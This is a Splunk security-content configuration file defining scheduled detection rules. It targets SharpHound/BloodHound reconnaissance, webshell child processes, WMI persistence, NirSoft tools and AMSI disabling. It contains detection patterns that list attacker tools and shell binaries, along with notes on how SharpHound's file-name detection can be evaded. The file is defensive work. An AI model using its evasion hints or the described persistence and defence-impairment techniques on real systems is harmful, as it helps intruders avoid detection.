action.escu.creation_date = 2024-03-14 action.escu.modification_date = 2024-03-14 action.escu.confidence = high action.escu.full_search_name = ESCU - Detect SharpHound File Modifications - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Windows Discovery Techniques", "Ransomware"] action.risk = 1 action.risk.param._risk_message = Potential SharpHound file modifications identified on $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 24}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 24}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Detect SharpHound File Modifications - Rule action.correlationsearch.annotations = {"analytic_story": ["Windows Discovery Techniques", "Ransomware"], "cis20": ["CIS 10"], "confidence": 80, "impact": 30, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1087.002", "T1069.001", "T1482", "T1087.001", "T1087", "T1069.002", "T1069"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = SharpHound is used as a reconnaissance collector, ingestor, for BloodHound. SharpHound will query the domain controller and begin gathering all the data related to the domain and trusts. For output, it will drop a .zip file upon completion following a typical pattern that is often not changed. This analytic focuses on the default file name scheme. 
Note that this may be evaded with different parameters within SharpHound, but that depends on the operator. `-randomizefilenames` and `-encryptzip` are two examples. In addition, executing SharpHound via .exe or .ps1 without any command-line arguments will still perform activity and dump output to the default filename. Example default filename `20210601181553_BloodHound.zip`. SharpHound creates multiple temp files following the same pattern `20210601182121_computers.json`, `domains.json`, `gpos.json`, `ous.json` and `users.json`. Tuning may be required, or remove these json's entirely if it is too noisy. During traige, review parallel processes for further suspicious behavior. Typically, the process executing the `.ps1` ingestor will be PowerShell. action.notable.param.rule_title = Detect SharpHound File Modifications action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Filesystem where Filesystem.file_name IN ("*bloodhound.zip", "*_computers.json", "*_gpos.json", "*_domains.json", "*_users.json", "*_groups.json", "*_ous.json", "*_containers.json") by Filesystem.file_create_time Filesystem.process_id Filesystem.file_name Filesystem.file_path Filesystem.dest Filesystem.user| `drop_dm_object_name(Filesystem)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_sharphound_file_modifications_filter` [ESCU - Detect SharpHound Usage - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies SharpHound binary usage by using the original filena,e. In addition to renaming the PE, other coverage is available to detect command-line arguments. 
This particular analytic looks for the original_file_name of `SharpHound.exe` and the process name. It is possible older instances of SharpHound.exe have different original filenames. Dependent upon the operator, the code may be re-compiled and the attributes removed or changed to anything else. During triage, review the metadata of the binary in question. Review parallel processes for suspicious behavior. Identify the source of this binary. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1087.002", "T1069.001", "T1482", "T1087.001", "T1087", "T1069.002", "T1069"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic identifies SharpHound binary usage by using the original filena,e. In addition to renaming the PE, other coverage is available to detect command-line arguments. This particular analytic looks for the original_file_name of `SharpHound.exe` and the process name. It is possible older instances of SharpHound.exe have different original filenames. Dependent upon the operator, the code may be re-compiled and the attributes removed or changed to anything else. During triage, review the metadata of the binary in question. Review parallel processes for suspicious behavior. Identify the source of this binary. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. 
Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = False positives should be limited as this is specific to a file attribute not used by anything else. Filter as needed. action.escu.creation_date = 2024-03-14 action.escu.modification_date = 2024-03-14 action.escu.confidence = high action.escu.full_search_name = ESCU - Detect SharpHound Usage - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Windows Discovery Techniques", "Ransomware"] action.risk = 1 action.risk.param._risk_message = Potential SharpHound binary identified on $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 24}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Detect SharpHound Usage - Rule action.correlationsearch.annotations = {"analytic_story": ["Windows Discovery Techniques", "Ransomware"], "cis20": ["CIS 10"], "confidence": 80, "impact": 30, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1087.002", "T1069.001", "T1482", "T1087.001", "T1087", "T1069.002", "T1069"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies SharpHound binary usage by using the original filena,e. In addition to renaming the PE, other coverage is available to detect command-line arguments. This particular analytic looks for the original_file_name of `SharpHound.exe` and the process name. 
It is possible older instances of SharpHound.exe have different original filenames. Dependent upon the operator, the code may be re-compiled and the attributes removed or changed to anything else. During triage, review the metadata of the binary in question. Review parallel processes for suspicious behavior. Identify the source of this binary. action.notable.param.rule_title = Detect SharpHound Usage action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.process_name=sharphound.exe OR Processes.original_file_name=SharpHound.exe) by Processes.dest Processes.user Processes.parent_process_name Processes.original_file_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_sharphound_usage_filter` [ESCU - Detect suspicious processnames using pretrained model in DSDL - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. The following analytic uses a pre-trained Deep Learning model to predict whether a processname is suspicious or not. 
Malwares and malicious programs such as ransomware often use tactics, techniques, and procedures (TTPs) such as copying malicious files to the local machine to propagate themselves across the network. A key indicator of compromise is that after a successful execution of the malware, it copies itself as an executable file with a randomly generated filename and places this file in one of the directories. Such techniques are seen in several malwares such as TrickBot. We develop machine learning model that uses a Recurrent Neural Network (RNN) to distinguish between malicious and benign processnames. The model is trained independently and is then made available for download. We use a character level RNN to classify malicious vs. benign processnames. The higher is_malicious_prob, the more likely is the processname to be suspicious (between [0,1]). The threshold for flagging a processname as suspicious is set as 0.5. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic uses a pre-trained Deep Learning model to predict whether a processname is suspicious or not. Malwares and malicious programs such as ransomware often use tactics, techniques, and procedures (TTPs) such as copying malicious files to the local machine to propagate themselves across the network. A key indicator of compromise is that after a successful execution of the malware, it copies itself as an executable file with a randomly generated filename and places this file in one of the directories. Such techniques are seen in several malwares such as TrickBot. We develop machine learning model that uses a Recurrent Neural Network (RNN) to distinguish between malicious and benign processnames. The model is trained independently and is then made available for download. We use a character level RNN to classify malicious vs. benign processnames. 
The higher is_malicious_prob, the more likely is the processname to be suspicious (between [0,1]). The threshold for flagging a processname as suspicious is set as 0.5. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = False positives may be present if a suspicious processname is similar to a benign processname. action.escu.creation_date = 2023-01-23 action.escu.modification_date = 2023-01-23 action.escu.confidence = high action.escu.full_search_name = ESCU - Detect suspicious processnames using pretrained model in DSDL - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Suspicious Command-Line Executions"] action.risk = 1 action.risk.param._risk_message = The process $process$ is running from an unusual place by $user$ on $dest$ with a processname that appears to be randomly generated. 
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 45}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 45}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Experimental - Detect suspicious processnames using pretrained model in DSDL - Rule action.correlationsearch.annotations = {"analytic_story": ["Suspicious Command-Line Executions"], "cis20": ["CIS 10"], "confidence": 90, "impact": 50, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes by Processes.process_name Processes.parent_process_name Processes.process Processes.user Processes.dest | `drop_dm_object_name(Processes)` | rename process_name as text | fields text, parent_process_name, process, user, dest | apply detect_suspicious_processnames_using_pretrained_model_in_dsdl | rename predicted_label as is_suspicious_score | rename text as process_name | where is_suspicious_score > 0.5 | `detect_suspicious_processnames_using_pretrained_model_in_dsdl_filter` [ESCU - Detect Use of cmd exe to Launch Script Interpreters - Rule] action.escu = 0 action.escu.enabled = 1 description = This search looks for the execution of the cscript.exe or wscript.exe processes, with a parent of cmd.exe. 
The search will return the count, the first and last time this execution was seen on a machine, the user, and the destination of the machine action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059", "T1059.003"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This search looks for the execution of the cscript.exe or wscript.exe processes, with a parent of cmd.exe. The search will return the count, the first and last time this execution was seen on a machine, the user, and the destination of the machine action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = This detection may also be triggered by legitimate applications and numerous service accounts, which often end with a $ sign. To manage this, it's advised to check the service account's activities and, if they are valid, modify the filter macro to exclude them. 
action.escu.creation_date = 2023-12-07 action.escu.modification_date = 2023-12-07 action.escu.confidence = high action.escu.full_search_name = ESCU - Detect Use of cmd exe to Launch Script Interpreters - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Emotet Malware DHS Report TA18-201A", "Suspicious Command-Line Executions", "Azorult"] action.risk = 1 action.risk.param._risk_message = cmd.exe launching script interpreters $process_name$ on $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 35}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Detect Use of cmd exe to Launch Script Interpreters - Rule action.correlationsearch.annotations = {"analytic_story": ["Emotet Malware DHS Report TA18-201A", "Suspicious Command-Line Executions", "Azorult"], "cis20": ["CIS 10"], "confidence": 50, "impact": 70, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059", "T1059.003"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This search looks for the execution of the cscript.exe or wscript.exe processes, with a parent of cmd.exe. 
The search will return the count, the first and last time this execution was seen on a machine, the user, and the destination of the machine action.notable.param.rule_title = Detect Use of cmd exe to Launch Script Interpreters action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.parent_process_name="cmd.exe" (Processes.process_name=cscript.exe OR Processes.process_name =wscript.exe) by Processes.parent_process Processes.process_name Processes.process Processes.user Processes.dest | `drop_dm_object_name("Processes")` | `security_content_ctime(firstTime)`|`security_content_ctime(lastTime)` | `detect_use_of_cmd_exe_to_launch_script_interpreters_filter` [ESCU - Detect Webshell Exploit Behavior - Rule] action.escu = 0 action.escu.enabled = 1 description = This search is used to detect the abuse of web applications by adversaries. Adversaries may install a backdoor or script onto web servers by exploiting known vulnerabilities or misconfigruations. Web shells are used to establish persistent access to systems and provide a set of executable functions or a command-line interface on the system hosting the Web server. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1505", "T1505.003"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This search is used to detect the abuse of web applications by adversaries. Adversaries may install a backdoor or script onto web servers by exploiting known vulnerabilities or misconfigruations. 
Web shells are used to establish persistent access to systems and provide a set of executable functions or a command-line interface on the system hosting the Web server. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Legitimate OS functions called by vendor applications, baseline the environment and filter before enabling. Recommend throttle by dest/process_name action.escu.creation_date = 2023-07-10 action.escu.modification_date = 2023-07-10 action.escu.confidence = high action.escu.full_search_name = ESCU - Detect Webshell Exploit Behavior - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["ProxyNotShell", "ProxyShell", "CISA AA22-257A", "HAFNIUM Group", "BlackByte Ransomware", "CISA AA22-264A", "Citrix ShareFile RCE CVE-2023-24489", "Flax Typhoon", "WS FTP Server Critical Vulnerabilities", "SysAid On-Prem Software CVE-2023-47246 Vulnerability"] action.risk = 1 action.risk.param._risk_message = Webshell Exploit Behavior - $parent_process_name$ spawned $process_name$ on $dest$. 
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 80}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 80}, {"threat_object_field": "process_name", "threat_object_type": "process"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Detect Webshell Exploit Behavior - Rule action.correlationsearch.annotations = {"analytic_story": ["ProxyNotShell", "ProxyShell", "CISA AA22-257A", "HAFNIUM Group", "BlackByte Ransomware", "CISA AA22-264A", "Citrix ShareFile RCE CVE-2023-24489", "Flax Typhoon", "WS FTP Server Critical Vulnerabilities", "SysAid On-Prem Software CVE-2023-47246 Vulnerability"], "cis20": ["CIS 10"], "confidence": 80, "impact": 100, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1505", "T1505.003"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This search is used to detect the abuse of web applications by adversaries. Adversaries may install a backdoor or script onto web servers by exploiting known vulnerabilities or misconfigruations. Web shells are used to establish persistent access to systems and provide a set of executable functions or a command-line interface on the system hosting the Web server. 
action.notable.param.rule_title = Detect Webshell Exploit Behavior
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count max(_time) as lastTime, min(_time) as firstTime from datamodel=Endpoint.Processes where (Processes.process_name IN ("arp.exe","at.exe","bash.exe","bitsadmin.exe","certutil.exe","cmd.exe","cscript.exe", "dsget.exe","dsquery.exe","find.exe","findstr.exe","fsutil.exe","hostname.exe","ipconfig.exe","ksh.exe","nbstat.exe", "net.exe","net1.exe","netdom.exe","netsh.exe","netstat.exe","nltest.exe","nslookup.exe","ntdsutil.exe","pathping.exe", "ping.exe","powershell.exe","pwsh.exe","qprocess.exe","query.exe","qwinsta.exe","reg.exe","rundll32.exe","sc.exe", "scrcons.exe","schtasks.exe","sh.exe","systeminfo.exe","tasklist.exe","tracert.exe","ver.exe","vssadmin.exe", "wevtutil.exe","whoami.exe","wmic.exe","wscript.exe","wusa.exe","zsh.exe") AND Processes.parent_process_name IN ("w3wp.exe", "http*.exe", "nginx*.exe", "php*.exe", "php-cgi*.exe","tomcat*.exe")) by Processes.dest,Processes.user,Processes.parent_process,Processes.parent_process_name,Processes.process,Processes.process_name | `drop_dm_object_name("Processes")` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_webshell_exploit_behavior_filter`

[ESCU - Detect WMI Event Subscription Persistence - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic identifies the use of WMI Event Subscription to establish persistence or perform privilege escalation. WMI can be used to install event filters, providers, consumers, and bindings that execute code when a defined event occurs. WMI subscription execution is proxied by the WMI Provider Host process (WmiPrvSe.exe) and thus may result in elevated SYSTEM privileges. This analytic is restricted by commonly added process execution and a path. If the volume is low enough, remove the values and flag on any new subscriptions.\
All event subscriptions have three components \
1. Filter - WQL Query for the events we want. EventID equals 19 \
2. Consumer - An action to take upon triggering the filter. EventID equals 20 \
3. Binding - Registers a filter to a consumer. EventID equals 21 \
Monitor for the creation of new WMI EventFilter, EventConsumer, and FilterToConsumerBinding. It may be pertinent to review all 3 to identify the flow of execution. In addition, EventCode 4104 may assist with any other PowerShell script usage that registered the subscription.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1546.003", "T1546"], "nist": ["DE.CM"]}
action.escu.data_models = []
action.escu.eli5 = The following analytic identifies the use of WMI Event Subscription to establish persistence or perform privilege escalation. WMI can be used to install event filters, providers, consumers, and bindings that execute code when a defined event occurs. WMI subscription execution is proxied by the WMI Provider Host process (WmiPrvSe.exe) and thus may result in elevated SYSTEM privileges. This analytic is restricted by commonly added process execution and a path. If the volume is low enough, remove the values and flag on any new subscriptions.\
All event subscriptions have three components \
1. Filter - WQL Query for the events we want. EventID equals 19 \
2. Consumer - An action to take upon triggering the filter. EventID equals 20 \
3. Binding - Registers a filter to a consumer. EventID equals 21 \
Monitor for the creation of new WMI EventFilter, EventConsumer, and FilterToConsumerBinding. It may be pertinent to review all 3 to identify the flow of execution. In addition, EventCode 4104 may assist with any other PowerShell script usage that registered the subscription.
action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs that provide WMI Event Subscription events from your endpoints. If you are using Sysmon, you must have at least version 6.0.4 of the Sysmon TA and have enabled EventID 19, 20 and 21. Tune and filter known good to limit the volume.
action.escu.known_false_positives = It is possible some applications will create a consumer and may be required to be filtered. For tuning, add any additional LOLBins for further depth of coverage.
action.escu.creation_date = 2021-06-16
action.escu.modification_date = 2021-06-16
action.escu.confidence = high
action.escu.full_search_name = ESCU - Detect WMI Event Subscription Persistence - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Microsoft Sysmon"]
action.escu.analytic_story = ["Suspicious WMI Use"]
action.risk = 1
action.risk.param._risk_message = Possible malicious WMI Subscription created on $dest$
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 63}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Detect WMI Event Subscription Persistence - Rule
action.correlationsearch.annotations = {"analytic_story": ["Suspicious WMI Use"], "cis20": ["CIS 10"], "confidence": 90, "impact": 70, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1546.003", "T1546"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = The following analytic identifies the use of WMI Event Subscription to establish persistence or perform privilege escalation. WMI can be used to install event filters, providers, consumers, and bindings that execute code when a defined event occurs. WMI subscription execution is proxied by the WMI Provider Host process (WmiPrvSe.exe) and thus may result in elevated SYSTEM privileges. This analytic is restricted by commonly added process execution and a path. If the volume is low enough, remove the values and flag on any new subscriptions.\
All event subscriptions have three components \
1. Filter - WQL Query for the events we want. EventID equals 19 \
2. Consumer - An action to take upon triggering the filter. EventID equals 20 \
3. Binding - Registers a filter to a consumer. EventID equals 21 \
Monitor for the creation of new WMI EventFilter, EventConsumer, and FilterToConsumerBinding. It may be pertinent to review all 3 to identify the flow of execution. In addition, EventCode 4104 may assist with any other PowerShell script usage that registered the subscription.
action.notable.param.rule_title = Detect WMI Event Subscription Persistence
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `sysmon` EventID=20 | stats count min(_time) as firstTime max(_time) as lastTime by Computer User Destination | rename Computer as dest | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_wmi_event_subscription_persistence_filter`

[ESCU - Detection of tools built by NirSoft - Rule]
action.escu = 0
action.escu.enabled = 1
description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. This search looks for specific command-line arguments that may indicate the execution of tools made by Nirsoft, which are legitimate, but may be abused by attackers.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1072"], "nist": ["DE.CM"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = This search looks for specific command-line arguments that may indicate the execution of tools made by Nirsoft, which are legitimate, but may be abused by attackers.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = While legitimate, these NirSoft tools are prone to abuse. You should verify that the tool was used for a legitimate purpose.
action.escu.creation_date = 2020-07-21
action.escu.modification_date = 2020-07-21
action.escu.confidence = high
action.escu.full_search_name = ESCU - Detection of tools built by NirSoft - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Emotet Malware DHS Report TA18-201A"]
action.risk = 1
action.risk.param._risk_message = tbd
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 25}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Experimental - Detection of tools built by NirSoft - Rule
action.correlationsearch.annotations = {"analytic_story": ["Emotet Malware DHS Report TA18-201A"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1072"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = This search looks for specific command-line arguments that may indicate the execution of tools made by Nirsoft, which are legitimate, but may be abused by attackers.
action.notable.param.rule_title = Detection of tools built by NirSoft
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime values(Processes.process) as process max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.process="* /stext *" OR Processes.process="* /scomma *" ) by Processes.parent_process Processes.process_name Processes.user | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detection_of_tools_built_by_nirsoft_filter`

[ESCU - Disable AMSI Through Registry - Rule]
action.escu = 0
action.escu.enabled = 1
description = This search identifies registry modifications that disable the Windows AMSI feature in order to evade detection. This technique has been seen in several ransomware, RAT and even APT campaigns to impair the defenses of the compromised machine and execute a payload while raising as few alerts as possible.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.001", "T1562"], "nist": ["DE.CM"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = This search identifies registry modifications that disable the Windows AMSI feature in order to evade detection. This technique has been seen in several ransomware, RAT and even APT campaigns to impair the defenses of the compromised machine and execute a payload while raising as few alerts as possible.
action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the registry value name, registry path, and registry value data from your endpoints. If you are using Sysmon, you must have at least version 2.0 of the official Sysmon TA. https://splunkbase.splunk.com/app/5709
action.escu.known_false_positives = A network operator may disable this Windows feature, but this is not common.
action.escu.creation_date = 2023-12-27
action.escu.modification_date = 2023-12-27
action.escu.confidence = high
action.escu.full_search_name = ESCU - Disable AMSI Through Registry - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Ransomware", "CISA AA23-347A", "Windows Registry Abuse"]
action.risk = 1
action.risk.param._risk_message = Disable AMSI Through Registry on $dest$
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 25}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Disable AMSI Through Registry - Rule
action.correlationsearch.annotations = {"analytic_story": ["Ransomware", "CISA AA23-347A", "Windows Registry Abuse"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.001", "T1562"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = This search identifies registry modifications that disable the Windows AMSI feature in order to evade detection. This technique has been seen in several ransomware, RAT and even APT campaigns to impair the defenses of the compromised machine and execute a payload while raising as few alerts as possible.
action.notable.param.rule_title = Disable AMSI Through Registry
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
